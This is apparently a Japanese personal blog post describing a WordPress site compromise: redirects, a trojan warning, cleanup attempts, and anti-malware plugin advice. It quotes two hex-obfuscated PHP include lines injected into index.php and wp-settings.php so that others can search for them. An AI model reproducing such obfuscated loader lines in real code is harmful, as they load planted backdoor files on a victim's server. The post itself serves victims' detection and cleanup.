お得なAmazonタイムセールはこちらをクリック！！

ベトナム旅行(4)ハノイの夜はTop of Hanoiの夜景とジャズバーとApricot Hotel

エジプト旅行記～到着・SIMカード・ベニス細川家～

【3000円】iPadの入るボディバッグLeaper買ったのでレビュー！

【スマホ】辞書登録機能が便利だった件

【禁煙】大田区蒲田のおすすめ禁煙レストラン居酒屋まとめ

【Cocoon】表組の中に横棒グラフをHTMLとCSSで描く方法！ #プラグイン減らそう委員会

PCデータをDS218jへバックアップするにはCloud Station Backupを使うよ！

ボイトレモニター開始から一ヶ月経過

内部リンク_show_article_map

週一回の筋トレで人は痩せられるか？

【秋葉原】魚丸けいすけ【居酒屋】

【祝】おすすめメンズ脱毛のドクターコバ大阪院が2018年3月開院！

【維持費86円iPhone】UQモバイルの爆安プランを説明するぞ！

HIS日帰りバスツアーでひたち海浜公園のネモフィラ！

【2022】準備OK?年に1度のAmazonプライムデーをお得に楽しむ方法！

【UTme!】1枚から作れるユニクロでオリジナルTシャツがおすすめ！

【体験報告】ドクターコバ銀座院で無制限医療レーザー髭脱毛したぞ！10回施術完了(さらに継続中)

【脱初心者】じゃんたまで雀傑(じゃんけつ)になるための4つのポイント【金の間】

ハック?クラック?WordPressでトロイの木馬検出したらやることリスト

Wordpress

2020.12.17

この記事は約5分で読めます。

ふるのーと

ふるのーと

「助けて～」

ここ最近ブログの調子が悪いので状況をメモしておきますね。

スポンサーリンク

目次

マルウェア・ウィルス・クラッキング・ハッキング
リダイレクトされる
トロイの木馬が表示される
試してみたこと
しばらくするとまた再発する
バックアップは取っておこう
はてなに移行しようかな
追記：バックドア型ウィルスFilesmanだった？
Anti-Malware Security and Brute-Force Firewallを入れよう
1. [追記]Anti-Malware Security and Brute-Force Firewallも駄目かも。

マルウェア・ウィルス・クラッキング・ハッキング

このあたりはよく分かりませんが、マルウェアとかウィルスとかいうのにかかったぽいです。

クラッキングというかハッキングというか、、まあ、攻撃されました(T_T)

リダイレクトされる

普通にアクセスすると、知らないページに飛ばされます。

すごい怪しいです。

ちなみにTOPページやカテゴリページが高い確率でやられます。

中には普通の個別ページもやられているところもあります。

us.aleatherk.top/dbccza(省略)

こんな感じのリンク経由で怪しいサイトに飛ばされます。

トロイの木馬が表示される

JS/TrojanDownloader.FakejQuery.B トロイの木馬

パソコン(Chrome、Edge)でトップページアクセスしようとすると、上記画面が出てアクセスできないんですよ。

これは焦りますよね。

管理画面にはアクセス出来る

良かったのかはわかりませんが、管理画面にはアクセスできるので色々試してみることはできました。

スマホからはアクセスできる（ときがある）

スマホからはアクセス出来るときがあるんですよね。

良いのか悪いのかはわかりませんが。

TOPページ、メニューページ以外はアクセスできるっぽい

全部は見てないですが、トップページやメニューページはアクセス出来るみたいなんですよね。

試してみたこと

WordPressやプラグイン、テーマを削除・再インストール

サーバからFFFTPでファイルを全て完全に削除して１から再インストール。

ファイルは前にバックアップを奇跡的に取っておいたものを利用。

(そもそもこの時点で攻撃されていたんではないか疑惑もあるのでなんともいえない。。。)

バックアップファイルはアップする前にウィルススキャンはしてからアップロード。

chromeブラウザのキャッシュクリア

一応ブラウザのキャッシュもクリアしておきました。

パスワードを複雑なものに変更・Google二段階承認プラグイン

意味があるかわかりませんが、パスワードを少々複雑なものに変更しました。

プラグインも入れてGoogle二段階承認プラグイン(Google Authenticator)も使うようにしました。

index.phpとwp-settings.phpが書き換えられていたので修正

パッと見てわかったところだと、index.phpとwp-settings.phpが書き換えれられていたので修正しました。

まずはindex.phpです。

赤枠の部分明らかにおかしいですよね。

次はwp-settings.phpです。

350行目だし、何だかよく分からないし、気づけないですよね。こんなの。(白目)

このコードを見かけたら気をつけてね

一応テキスト検索で引っかかるようにテキストでも書いておきますね。

include “\x2fhom\x65/me\x6ctin\x67ton\x65/fu\x6clno\x74ebl\x6fg.c\x6fm/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/up\x67rad\x65/he\x61der\x2ephp”;

* WordPre*/include /*ss Widget Factory Object
* @global WP_Widget_Fa*/”\x2fhom\x65/me\x6ctin\x67ton\x65/fu\x6clno\x74ebl\x6fg.c\x6fm/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/pl\x75gin\x73/yo\x75tub\x65-em\x62ed-\x70lus\x2fdir\x73.ph\x70″;/*ctory $wp_widget_factory

login.php、lib10.php、utf.phpを削除

ダウンロードも出来ないので、中身は見れませんが、

ダウンロード出来ない時点でかなり怪しいので以下は削除しました。

login.php
lib10.php
utf.php

しばらくするとまた再発する

理由はわかりませんが、再発していてココ１ヶ月はこんな感じで復旧作業くらいしかやっていません。

今は大丈夫なのでココらへんで落ち着いて欲しいです。(´；ω；｀)

バックアップは取っておこう

まあ、何はともあれバックアップを少し前にとっておいたのは奇跡でした。

それほど大変でもないのでバックアップを取っていない人は今すぐにでもバックアップを取るべきですね。

はてなに移行しようかな

時代の流れには逆行する形になりますが、こんな作業するためにブログ書いているわけではないのでいよいよはてなに移行する時が来たのかもしれませんね。

追記：バックドア型ウィルスFilesmanだった？

パスワード変更とか、ファイル修正とか、バックドアウィルスだとあんまり意味ないらしいです。

直しても裏口からいたずらされちゃうらしいです(白目)

Anti-Malware Security and Brute-Force Firewallを入れよう

取り敢えず、怪しいと思ったらAnti-Malware Security and Brute-Force Firewallというプラグインを入れましょう。

https://ja.wordpress.org/plugins/gotmls/

テーマをチェックするプラグインとか、プラグインをチェックするプラグインとかより、Anti-Malware Security and Brute-Force Firewallのほうがいいです。

[追記]Anti-Malware Security and Brute-Force Firewallも駄目かも。

一度被害にあうと、結構対策大変ですよね。

Anti-Malware Security and Brute-Force Firewallもあまり効果ないかもしれません。。

バックアップを取ってあれば、それをもって別のレンタルサーバに構築してみるのが良いかもしれません。

無料期間に移行してみて、駄目だったら、解約してもいいですしね。

ConoHa WING、mixhost 、エックスサーバーなど大手がセキュリティ的にも安心です。

同じような被害にあわれた方の参考になれば。

タイトルとURLをコピーしました